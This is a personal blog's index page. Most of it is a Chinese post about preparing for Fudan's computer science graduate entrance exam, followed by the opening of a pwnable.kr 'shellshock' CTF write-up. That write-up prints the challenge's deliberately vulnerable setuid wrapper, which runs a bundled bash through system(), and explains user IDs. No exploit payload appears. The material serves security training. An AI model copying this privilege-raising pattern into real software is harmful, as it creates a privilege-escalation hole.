index.html

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Gemini","version":"7.7.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="分享一些bin学习日常">
<meta property="og:type" content="website">
<meta property="og:title" content="Coldshield&#39;s blog">
<meta property="og:url" content="http://yoursite.com/index.html">
<meta property="og:site_name" content="Coldshield&#39;s blog">
<meta property="og:description" content="分享一些bin学习日常">
<meta property="og:locale" content="en_US">
<meta property="article:author" content="Coldshield">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://yoursite.com/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : true,
    isPost : false
  };
</script>

  <title>Coldshield's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Coldshield's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">Mostly PWN & RE</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="fa fa-fw fa-link"></i>友链</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
        
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block home" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2021/06/27/%E8%80%83%E7%A0%94%E7%BB%8F%E5%8E%86/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Coldshield">
      <meta itemprop="description" content="分享一些bin学习日常">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshield's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
            <a href="/2021/06/27/%E8%80%83%E7%A0%94%E7%BB%8F%E5%8E%86/" class="post-title-link" itemprop="url">考研经历</a>
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-06-27 23:11:36" itemprop="dateCreated datePublished" datetime="2021-06-27T23:11:36+08:00">2021-06-27</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-06-29 10:49:10" itemprop="dateModified" datetime="2021-06-29T10:49:10+08:00">2021-06-29</time>
              </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2021/06/27/%E8%80%83%E7%A0%94%E7%BB%8F%E5%8E%86/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2021/06/27/%E8%80%83%E7%A0%94%E7%BB%8F%E5%8E%86/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="考研经历（复旦大学计算机学院电子信息）"><a href="#考研经历（复旦大学计算机学院电子信息）" class="headerlink" title="考研经历（复旦大学计算机学院电子信息）"></a>考研经历（复旦大学计算机学院电子信息）</h1><blockquote>
<p>总算是毕业了，考研经验贴一直在拖拖拖，总算在六月底的某个夜里心血来潮来给学弟学妹们分享一些个人的考研经验了。之所以选择这个时间点，没有选择3 4月份复试完直接写，一方面是因为之前太懒了…抱歉hhhh；还有一方面是我觉得前期的那些准备工作网上都铺天盖地的，没必要把别人都总结好的东西再拿来干嚼一遍，我个人前期备考也基本是参考网文。</p>
</blockquote>
<h1 id="考研成绩"><a href="#考研成绩" class="headerlink" title="考研成绩"></a>考研成绩</h1><img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/psc" alt="img" style="zoom: 50%;">

<p>确实是靠数学和专业课撑起来的，去年疫情+暑期不能回校真的各种考验心态和时间规划，我个人9月前都是一直在家备考，受各种因素影响在政治和英语的投入很少，分数理所应当的低…..少到什么程度呢…..大概就是英语这方面我只有前期听课的单词基础和语法基础，然后政治我是从十月十一月开始准备的，所以建议你们最好暑假就开始刷一刷政治课，然后英语不要间断阅读训练和单词积累。</p>
<p>复试成绩高大概是因为本科做的事情（比如打CTF）还有毕设（Fuzzing相关）和那边的研究方向比较match，所以我现在(6月)就已经开始接触那边的论文和项目代码了，而且当时自己答的也还行，虽然情绪上有些紧张啥的，但提问就只是提问，只要能正常交流而且问题答上来就好了。</p>
<h2 id="初试（总成绩50-）"><a href="#初试（总成绩50-）" class="headerlink" title="初试（总成绩50%）"></a>初试（总成绩50%）</h2><blockquote>
<p>初试经验写在这你们看看就行，这些网上应该也是很多的，有些东西就是赘述了</p>
</blockquote>
<h3 id="数学"><a href="#数学" class="headerlink" title="数学"></a>数学</h3><p>分数：142</p>
<p>不夸张的讲，感觉今年数学二相对来说确实简单，拿到考卷的感觉就是很舒服，基础知识扎实的话会觉得没啥刁钻题，考的知识点也是平时上课笔记里都有的，当时考场上写的比平时要慢也剩了差不多半小时吧，写的慢是因为我希望简单不丢分。但是虽然这么说….填空题有一题计算的时候把π/2的倒数2/π脑抽地写了个2π，就还是丢了5分，然后剩下的两分是因为漏了一个点 漏了一个渐近线，所以做数学题细心还是很重要的，平时练题也不要懒计算量，该算就算。</p>
<p>要说分享什么经验的话，其实大佬网友们的经验应该都很全了，我的能作为补充就补充吧…</p>
<p>我高数是跟的汤家凤的基础课+强化课，他的1800我在前期写了数一的基础部分（当时不确定自己是考数一还是数二），后来因为408的内容太多我感觉写不完就没写了，本来确定考复旦后想换数二的1800写写高数强化，结果买来放那快递袋子都没拆，疫情+暑期+生产实习结束后在学校真就狂肝408去了，时间太紧只能自己balance。然后线代是跟的李永乐，也是因为时间紧，没来得及刷题，这俩主要就是靠我9月生产实习结束后实打实刷了高数讲义（汤）和线代讲义（李）而且做了很多题型笔记，各种体会考点+学习做题方法然后记下来。十一月底开始写真题写模拟卷，就是每见到一个题目就想这个题在考什么，能不能对应讲义上的题目类型，自己记不记得怎么解，笔记上有没有，如果记忆中没有这个知识点那就查漏补缺，这样刷下来一套卷子就是有价值的，然后整理这些卷子的错题还有各种解题方法，千万不能跳过自己不熟不会的地方(包括自己不熟悉的解题方法，特别是真题上的)，写卷子跳过自己的弱点就是在浪费卷子+想不开，因为你不知道这些东西会不会在考试的时候碰到。还有计算量也要注意，暑期还有时间可以多练练，这些年真题给我的感觉就是计算量慢慢开始增大了。</p>
<p>emmm所以总的来说应该就是多记多见多算吧，还有基础知识的掌握是非常重要的，等你们写真题写到今年(2021)数二填空题最后一题就知道了，基础知识扎实的话可以秒杀，基础知识不扎实的就会干瞪眼算到头大。</p>
<h3 id="专业课"><a href="#专业课" class="headerlink" title="专业课"></a>专业课</h3><p>分数：123</p>
<blockquote>
<p>ps: 408真的很多，一定要给足时间投入</p>
</blockquote>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210627005807825.png" alt="image-20210627005807825" style="zoom: 33%;">

<p>这是去年复习408的时候发的签名，杀疯了哈哈哈哈。我最开始复习408应该是5，6月的样子吧，但是在家的时候5，6月真的各种心烦意乱，考试大作业报告什么的间断我一下就很难受，完全不能按照自己的理想计划来，所以一直到7月底我才复习完数据结构，就是刷完王道的那一整本书，然后八月复习完操作系统，9月一边生产实习一边复习计组，到10月初复习完计组又开始啃计网，然后十月底结束408的第一大轮复习。也就是说我从5月~10月才结束408的第一轮，不过我的第二轮复习只用了一个月，整个十一月我真的就是每天拿4~5个小时出来，抱着王道的四本书不停的抄、记，平均一周一本书（300多面），因为第二轮不用再完整的做题了，只用回顾错题，所以只是专注知识点复习的话就很快，肝起来就像期末考试一样的一直刷一直记。这四门课很大程度上还是啃了大二大三的老本，除了操作系统生疏一些（因为操作系统有很多概念和定义性的东西），计组计网我都算复习的比较快了。</p>
<p>感觉复习专业课知识就是反复地在理解的基础上记忆，然后自己画知识导图，每一门大课，每一章，我都有画过对应的知识导图。而且平时自己用到专业课知识也算比较频繁，认真看一看就很容易理解，关键在于记忆，看后面忘前面的感觉在后期真的会把人逼疯，列知识导图很重要，而且一般复习轮数推荐在两轮以上，这样配合知识导图会记得比较牢。</p>
<p>刷起真题来就是把知识运用到写题里然后查漏补缺，和数学一样，只要是印象中没有或者忘了的东西，全都要自己重新记一遍，然后把自己的易错点整理下来，如果存在理解性错误就赶紧重视。（这里有个小插曲哈哈哈哈哈，当时刷完近十几年的408真题之后，我用一张A4大小的纸整理了一整页的易错点还有查漏补缺的内容，考前半周的时候刷了一次，本来准备考前那个晚上再认真看一看的，结果发现它掉….掉….了…，虽然最后应该没有因为这张纸上面的知识点丢分，毕竟大部分是自己记忆下来了。所以你们要是用纸整理知识点什么的千万别弄丢，越到后期这种时间越宝贵，别因为丢了东西要重新花时间整理）</p>
<blockquote>
<p>补充：408真题和数学真题一样建议从后往前做，尽量保证选择题的正确率，考场上大概会有10分左右的东西在当年的王道资料上是没有的，如果碰到这种题不要慌，不会做先跳过就好了</p>
</blockquote>
<h3 id="英语-amp-政治"><a href="#英语-amp-政治" class="headerlink" title="英语&amp;政治"></a>英语&amp;政治</h3><p>保命分数没啥参考价值…..不过英语我倒是一直有听TED，然后扇贝阅读打卡。12月还报了一次六级，提前习惯了一下考试氛围，最后考了490多吧，比第一次六级高了60分，所以感觉坚持阅读和保持语感还是有用的。政治只能说肖秀荣牛逼，但是想拿高一点分数你自己还是得有话写，上海压不压分我不知道，但是我选择题34分的话，也就是说主观题我照着肖4写满了也只有27分，推荐不要学我只靠肖四肖八保命…..还是要好好听政治课的！</p>
<h2 id="复试（总成绩50-）"><a href="#复试（总成绩50-）" class="headerlink" title="复试（总成绩50%）"></a>复试（总成绩50%）</h2><p>复旦的复试分英语口语还有编程摸底、专业面试（英语口语10%，编程摸底40%，专业面试50%），而且今年也是线上复试，在专业面试之前会让你填一遍志愿，计算机学院这边AI和大数据组招的名额会特别多，可能招300人的话这两个方向就有200个人，当然也很卷。我报的系统软件与安全实验室这边只有16个名额，相对来说少很多，但大家的初试分数会更能让人接受一些，当然复旦主要还是看复试分数啦~（想想今年435的复试被刷了就知道什么水平了…..）</p>
<h3 id="英语口语"><a href="#英语口语" class="headerlink" title="英语口语"></a>英语口语</h3><p>时长5分钟，我硬刚了，准备的不是很多，只把408中的一些专业课知识的英文陈述背了背，语言组织就啃着我听TED的老本……</p>
<p>上来会有一段自我介绍，一分半钟左右，老师会根据你自我介绍中的信息进行提问，所以千万别给自己挖坑</p>
<p>我被问到的问题三个，但我第一个问题实在是听不清楚…….也不知道是我对那几个单词太生疏了还是老师麦糊听不清，大概就是说我提到manage myself然后啥啥啥的，说了几遍Sorry, I can’t hear clearly老师就跳过了……..当时根本顾不上紧张就换了一个…助理学生？和我对话，这个人离麦比较近所以听的清楚一点。然后就问了我dream job，好家伙，bin方向辣鸡CTFer的dream job那可是再熟悉不过了，当然是各种安全实验室，这里我说的还是挺多的，之后因为我自我介绍提到了比赛，所以问了问我得过什么奖就结束了。比网上某老哥被问到TCP/IP啥的要友好很多，自己基本还是会答，也有可能是因为老师看到我英语分数太低了不好意思问难（</p>
<h3 id="编程摸底"><a href="#编程摸底" class="headerlink" title="编程摸底"></a>编程摸底</h3><p>记得当时是时长3小时好像，这个刷题多刷就好，多刷多见识，考完初试自我感觉不错的话年过完了就开始刷吧，虽然我是主要按PAT甲准备的，刷了一百题左右的PAT还有寒假刷的二十几道leetcode上的动态规划，但是复旦这次考的全是leetcode上的原题（70 494 1448），所以机试还是得多刷一些leetcode，特别是PAT好像没啥动态规划，但是动态规划复旦每年都考，一定要记得刷一下动态规划的专题</p>
<h3 id="专业面试"><a href="#专业面试" class="headerlink" title="专业面试"></a>专业面试</h3><p>时长15分钟，先过心理关，不要太紧张，一群人围着你的时候该说什么说什么，也不要给自己挖坑，老师会顺着你说的话疯狂追问你，最好找一个有考研面试经验或者已经工作的学长学姐给你模拟面试一次，提前熟悉这个氛围后会好一些。</p>
<p>首先你的机试是必问的，记得考完机试去看看写出来的题还有没有更优解，没写出来的题怎么写。</p>
<p>毕设、项目、竞赛这种东西肯定也会问的，要不然就没啥好聊的了，所以推荐早点把毕设思路想明白，年底毕设选题的时候想清楚自己要做什么，如果有自己的小创新小优化就很好，不管是电话面试还是正式的专业面试都会有不错的印象。如果可以，尽量让自己做的东西和对方的研究方向match上，可以去看看他们发了什么论文，在做什么之类的。</p>
<p>至于面试加压，怎么说呢，保证自己态度要好，虚心接受，但是也别一被怼就怂成馒头弹不起来了，记得适当跟老师解释说明但也不要表现的很强硬，心平气和的交流很重要，就算你觉得老师误解了你的意思，你也一定要说明清楚，别含含糊糊的。</p>
<blockquote>
<p>补充：专业面试开始时也会有一个自我介绍，把本科做的事情大致说一说，别挖坑，因为老师会疯狂追问你。</p>
</blockquote>
<h2 id="电话面试"><a href="#电话面试" class="headerlink" title="电话面试"></a>电话面试</h2><p>这个是分数出来之后，看一看复试群里面的大致排名，觉得有希望就可以去联系老师了，老师会对你本科做的事情还有学习态度、学习能力创新能力之类的做一个估算，通过提问不断了解你，聊的东西可能比专业面试还要多，我当时和老师聊了差不多半小时的样子hhhh，聊完感觉挺好的。</p>
<p>然后是一些之前在学校被问到的东西，经典Q&amp;A环节：</p>
<h1 id="Q-amp-A"><a href="#Q-amp-A" class="headerlink" title="Q&amp;A"></a>Q&amp;A</h1><h2 id="1-当初是什么让你在就业和考研中选择了考研？你是如何看待这两个选择的。"><a href="#1-当初是什么让你在就业和考研中选择了考研？你是如何看待这两个选择的。" class="headerlink" title="1.当初是什么让你在就业和考研中选择了考研？你是如何看待这两个选择的。"></a>1.当初是什么让你在就业和考研中选择了考研？你是如何看待这两个选择的。</h2><p>在大学刚入学那会就有读研的想法了，当年单纯是觉得这个机会能弥补高考的遗憾。再后来，自己在专业相关的比赛和冬夏令营结识了很多外校的朋友(包括已经工作的还有在读研的)，从他们那了解到了一些院校、公司的情况和差别，感觉学术研究氛围更吸引我，所以在考研和就业之间决定了考研。</p>
<p>对于我个人的话，读研，在学术氛围里我能更好保持对专业知识的求知欲；直接进入社会工作，相对来说在知识层面就显得没那么专一。当然这两个选择要视自己实际情况而定，比如有的人就对研究不感冒，更偏爱实际生产中的体验和收获。当然读研也是一个能让我以后有更多选择余地的事情。</p>
<h2 id="2-在考研当中，学长认为什么是最重要的？如心态、计划等。"><a href="#2-在考研当中，学长认为什么是最重要的？如心态、计划等。" class="headerlink" title="2.在考研当中，学长认为什么是最重要的？如心态、计划等。"></a>2.在考研当中，学长认为什么是最重要的？如心态、计划等。</h2><p>个人认为心态比计划重要很多。如果执行能力没有那么强，或者说你定的计划太多太完美——想的太好，结果执行不能”落地”，那么这时候心态的重要性就凸显出来了。如果是真心想考研，面对一次又一次的计划落空，一次又一次的进度落后，你会怎么想？是继续严格执行计划，把自己的能动性逼出来；还是说根据实际情况，重新对自己的能力做出评价，换个目标？……</p>
<p>考研路上既有把厕所时间都安排到定点的人，也有不定确切计划走一步看一步的人，但这些都不是他们能否考高分的决定因素，决定最后考试能否考高分，就是面对考题时：会、记得、不写错。</p>
<p>个人觉得，保持”我要学会”的心态很重要，有一个好心态之后动态地安排学习计划，比如前一次执行效果不好，就反思后再重新安排。不管每轮或每月的学习计划执行的是否满意、最后冲刺阶段是否紧张，只要是面对知识，就在”我要学会”的驱动下质问自己会不会，之后为了掌握知识，你就学会了慢慢做出适合自己的计划调整。</p>
<h2 id="3-学长是如何为自己的考研做准备的，应该怎样安排考研复习计划比较好，怎样平衡竞赛与课业任务的？有什么妙招吗？"><a href="#3-学长是如何为自己的考研做准备的，应该怎样安排考研复习计划比较好，怎样平衡竞赛与课业任务的？有什么妙招吗？" class="headerlink" title="3.学长是如何为自己的考研做准备的，应该怎样安排考研复习计划比较好，怎样平衡竞赛与课业任务的？有什么妙招吗？"></a>3.学长是如何为自己的考研做准备的，应该怎样安排考研复习计划比较好，怎样平衡竞赛与课业任务的？有什么妙招吗？</h2><p>开始的时候首先了解院校、专业、科目、报录比之类的信息，这些在外面的各种考研平台都有，不必在这里细说。之后根据考试科目安排一个大致的复习框架和复习轮数之类的，当然这里也可以参考各大平台的上岸经验贴，科目经验网上到处都是，个人感觉没必要赘述（srds，6月写经验的时候还是写了哈哈哈哈哈），这些我很多也是照着网上的经验贴来的，然后按我前面说的，自己调整就可以了。</p>
<p>竞赛的话得看个人水平和科目掌握情况，如果自身能力比较强，考试科目掌握情况也比较好，想接着在竞赛上打出成绩，就视自己的精力参加（比如复旦那边上岸的好像就有经常打比赛做项目，最后复习三四个月400多分的人）。如果是本来就没有打过比赛，想趁着考研的学习劲头两手一起抓，好让自己在复试能有东西说，那么我的建议是尽量别。以我个人为参考，去年五六月份感觉自己缺少项目经验，想做个项目，结果在期末考试和复习的干扰之下根本没有那么多心思来管项目的东西，之后进入考研黄金期，就更难抽出心思来了。如果是真想复试有东西可以和老师聊，建议可以把毕设当成项目做，做出自己的小创新。</p>
<p>课业肯定要好好学。这个没啥好说的，根据大一二三的经验应该知道怎么做了，只不过是课业之后花更多时间备考。</p>
<h2 id="4-考研是一个持久战，你曾有没有动摇过，是什么让你坚持不懈一直走下去的？"><a href="#4-考研是一个持久战，你曾有没有动摇过，是什么让你坚持不懈一直走下去的？" class="headerlink" title="4.考研是一个持久战，你曾有没有动摇过，是什么让你坚持不懈一直走下去的？"></a>4.考研是一个持久战，你曾有没有动摇过，是什么让你坚持不懈一直走下去的？</h2><p>初期动摇还是挺普遍的，只是多少问题。面对突然的选择、面对两点一线（甚至疫情在家是床和桌子的两点一线）、面对高压的学习氛围、面对全精力的投入代价，对比起大一二相对来说舒服一些学习环境，肯定会觉得很难，怀疑自己是不是找实习会更好。</p>
<p>后来辛苦备考的时候，朋友圈一会是xxx在xx厂入职，一会是xxx在xx厂办的比赛中拿奖、拿到绿色直通，还有最后9、10月份的各种保研截图（特别是冬令营的队友保了北大….），都让我一度”怀疑人生”。</p>
<p>最后明确考研目标，首先是承认了自己的缺点，承认了自己学习、比赛上确实不如校外的朋友们，没能像他们一样把GPA拿的很高等等，既然我是羡慕他们的经历、而且想读研，那么当时的情境下就只能就靠考研这条路来突破，只能在这件事上”做更多功”，想不到别的办法。后期结合我之前提到的，带着”我要学会”的心态，就专注于能让我学会知识，拿到分的办法去了，在考场上面对考题都只是一直在问自己：”这题在考什么，我会不会”，而没有像当年高考一样想着”考不上怎么办，考的不好怎么办”。</p>
<p>我觉得当时那个情境配合自己的心态是我能坚持下来的一个核心原因。</p>
<h2 id="5-考研要注意哪些事情"><a href="#5-考研要注意哪些事情" class="headerlink" title="5.考研要注意哪些事情"></a>5.考研要注意哪些事情</h2><p>分条列举一部分吧，这个问题太宽泛了</p>
<p>生活上</p>
<ul>
<li>注意劳逸结合，让自己学习的时候精力充沛。比如作息这种，考研阶段每个人都不太一样，只能靠自己慢慢体会，调整。</li>
<li>娱乐时间不要太长。比如一下好多天不学，这样很容易让自己把刚学的知识忘掉，也比较难再进入状态。到了复习后期，个人建议是最多一周内选择一天的早+午或者午+晚休息</li>
<li>多吃点，吃好点。专注复习消耗大</li>
<li>让室友尽量配合。比如晚上不要打游戏</li>
<li>小心那些不理解你考研的朋友。</li>
<li>结不结伴考研要视自己性格还有朋友性格而定。我基本是全程一个人准备的，除了有问题要问同学以外。</li>
</ul>
<p>学习上首先保持好心态，列计划后学会调整，重复记忆很重要，”学会”最大。其他好像没啥好说的，网上经验贴这块应该是共通的….</p>
<p>感情上（如果有的话），需要两个人好好商量一下，毕竟是关系你们各自未来的事情。自己要提醒自己即使在感情最坏的情况下也不要影响考研，因为感情问题在考研上崴脚的人真的太多了。</p>
<p>工作考研以及二战啥的就不知道了….自己也没经历过</p>
<h2 id="6-考研期间有没有发生令你印象很深刻的事，或者受到谁给予的很大鼓励与帮助？如果有可以简要谈一谈，以及自己对此的感想吗？"><a href="#6-考研期间有没有发生令你印象很深刻的事，或者受到谁给予的很大鼓励与帮助？如果有可以简要谈一谈，以及自己对此的感想吗？" class="headerlink" title="6.考研期间有没有发生令你印象很深刻的事，或者受到谁给予的很大鼓励与帮助？如果有可以简要谈一谈，以及自己对此的感想吗？"></a>6.考研期间有没有发生令你印象很深刻的事，或者受到谁给予的很大鼓励与帮助？如果有可以简要谈一谈，以及自己对此的感想吗？</h2><p>印象很深刻的事，疫情就算一个，对此的感想只想说人要保持乐观，当初对于疫情考研这件事，有的人觉得疫情在家肯定复习不好，有的人会觉得疫情创造的环境是个机会。</p>
<p>还有我冬令营的北航研究生班助给予了我很多鼓励和帮助，真的很感谢他，暑假有一次在家情绪特别低落，特地找他从我的高考聊到考研，听我倾诉完之后他跟我说：”要多肯定自己”。因为人对他人的反馈是很敏感的，自我暗示也一样，对于成果和收获要及时给自己加之正反馈，这样在学的时候就能更有信心。</p>
<h2 id="7-学长对想要考研的学弟学妹们有什么建议？能说一声自己的经验吗？"><a href="#7-学长对想要考研的学弟学妹们有什么建议？能说一声自己的经验吗？" class="headerlink" title="7.学长对想要考研的学弟学妹们有什么建议？能说一声自己的经验吗？"></a>7.学长对想要考研的学弟学妹们有什么建议？能说一声自己的经验吗？</h2><p>上面该说的经验我都说的差不多了，多提一嘴的东西就是重复记忆，要记得学的时候把学到的东西都用笔记下来，还有错过的题目也是，考研毕竟是一个长期过程，才学到的东西说不定过一两个月就忘了，遗忘速度是很快的。</p>
<p>希望考研这个经历带给你们的不只是考研本身，而是在人生层面能带给你们成长，往后走能完完全全准备好的事会越来越少，大家都是第一次，只要不懈怠，在最后无论什么结果都会好受一些，加油！</p>
<h1 id="Others"><a href="#Others" class="headerlink" title="Others"></a>Others</h1><p>然后推荐一个我特别特别特别特别喜欢的经验贴，简直是我前期动摇时候的强心剂，真的很喜欢，我巴不得全文引用hhhhhh</p>
<blockquote>
<p><a href="https://zhuanlan.zhihu.com/p/26254149" target="_blank" rel="noopener">https://zhuanlan.zhihu.com/p/26254149</a></p>
</blockquote>
<p>再晒一下6.27号到的录取通知书，给你们沾沾喜气~</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210627224747007.png" alt="image-20210627224747007" style="zoom:33%;">

<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210627224821122.png" alt="image-20210627224821122" style="zoom: 25%;">

<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210627224904232.png" alt="image-20210627224904232" style="zoom:24%;">

      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

        
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block home" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2021/04/07/pwnable-kr%E2%80%94%E2%80%94shellshock/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Coldshield">
      <meta itemprop="description" content="分享一些bin学习日常">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshield's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
            <a href="/2021/04/07/pwnable-kr%E2%80%94%E2%80%94shellshock/" class="post-title-link" itemprop="url">pwnable.kr——shellshock</a>
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2021-04-07 23:35:35 / Modified: 23:36:21" itemprop="dateCreated datePublished" datetime="2021-04-07T23:35:35+08:00">2021-04-07</time>
            </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2021/04/07/pwnable-kr%E2%80%94%E2%80%94shellshock/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2021/04/07/pwnable-kr%E2%80%94%E2%80%94shellshock/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="pwnable-kr-——-shellshock"><a href="#pwnable-kr-——-shellshock" class="headerlink" title="pwnable.kr —— shellshock"></a>pwnable.kr —— shellshock</h1><p>题目有这样一串代码（shellshock.c）</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">	setresuid(getegid(), getegid(), getegid());</span><br><span class="line">	setresgid(getegid(), getegid(), getegid());</span><br><span class="line">	system(<span class="string">"/home/shellshock/bash -c 'echo shock_me'"</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>因为有些知识记的不太清了这里就再复习一下euid，ruid，suid什么的</p>
<ul>
<li>ruid（real）：用于在系统中标识用户，当用户成功登录一个UNIX系统后就唯一确定</li>
<li>euid（effective）：用于系统决定用户对系统资源的访问权限，通常情况下等于ruid。当碰上程序属主设置了setuid位的时候，执行该程序会将euid改为文件属主</li>
</ul>
<p>gid同理，所以这里执行到system的时候已经有对应的组权限了（flag在对应组可读）</p>
<img src="https://cdn.jsdelivr.net/gh/Coldshield/image_stored/image-20210407125845099.png" alt="image-20210407125845099" style="zoom:80%;">

